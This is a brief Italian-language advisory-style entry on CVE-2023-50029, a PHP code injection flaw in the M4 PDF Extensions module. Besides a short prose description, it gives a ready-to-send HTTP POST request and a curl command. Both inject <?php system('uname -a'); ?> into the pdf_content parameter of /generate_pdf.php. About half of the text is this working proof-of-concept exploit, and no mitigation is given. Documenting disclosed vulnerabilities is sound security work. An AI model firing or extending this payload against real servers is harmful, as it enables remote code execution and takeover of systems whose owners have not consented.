
CVE-2023-50029: Vulnerabilità di iniezione PHP nel modulo M4 PDF Extensions
CVE-2023-50029 è una vulnerabilità di iniezione PHP nel modulo M4 PDF Extensions. Questa vulnerabilità consente agli attaccanti di iniettare ed eseguire codice PHP arbitrario sul server, permettendo loro di ottenere il pieno controllo del sistema target. Il problema risiede nella convalida impropria degli input, che consente il passaggio di codice malevolo attraverso parametri utente.
POST /generate_pdf.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 59
pdf_content=<?php system('uname -a'); ?>
curl -X POST http://example.com/generate_pdf.php -d "pdf_content=<?php system('uname -a'); ?>"